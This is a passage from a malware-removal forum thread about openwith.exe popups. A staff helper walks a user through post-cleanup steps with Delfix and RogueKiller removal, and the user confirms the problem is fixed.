0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 260 MB
1 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 534528 | Size: 16 MB
2 - Basic data partition | Offset (sectors): 567296 | Size: 908252 MB
3 - Basic data partition | Offset (sectors): 1860667392 | Size: 25600 MB
4 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1913096192 | Size: 1000 MB
5 - Basic data partition | Offset (sectors): 1915144192 | Size: 17740 MB
6 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 1951475712 | Size: 1000 MB
User = LL1 ... OK
User = LL2 ... OK



This one seems to have solved the problem because the openwith.exe disappeared as soon as I deleted the infected files... Thank you so much Kevin.

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #12 on: November 20, 2017, 10:23:12 AM »
You're very welcome feelityd08, continue as follows to clean up...

Delete RogueKiller portable from your Downloads folder, also delete this folder: C:\ProgramData\RogueKiller

Next,

Download "Delfix by Xplode" and save it to your desktop.

Or use the following if first link is down:

"Delfix link mirror"

If your security program alerts to Delfix, either accept the alert or turn your security off.

Double-click to start the program. If you are using Vista or higher, please right-click and choose Run as administrator.

Make Sure the following items are checked:


  • Remove disinfection tools <----- this will remove tools we may have used.
  • Purge System Restore <--- this will remove all previous and possibly exploited restore points; a new point relative to system status at present will be created.
  • Reset system settings   <--- this will reset any system settings back to default that were changed either by us during cleansing or malware/infection

Now click on "Run" and wait patiently until the tool has completed.

The tool will create a log when it has completed. We don't need you to post this.

Any remnant files/logs from tools we have used can be deleted…

Next,

Read the following links to fully understand PC Security and Best Practices, you may find them useful....

Answers to Common Security Questions and best Practices

Do I need a Registry Cleaner?

Take care and surf safe

Kevin... 

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #13 on: November 20, 2017, 10:36:51 AM »
It's done Kevin. Thank you so much, you are a life saver.

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #14 on: November 20, 2017, 12:52:56 PM »
You're very welcome feelityd08, feel free to come back anytime....

Regards,

Kevin....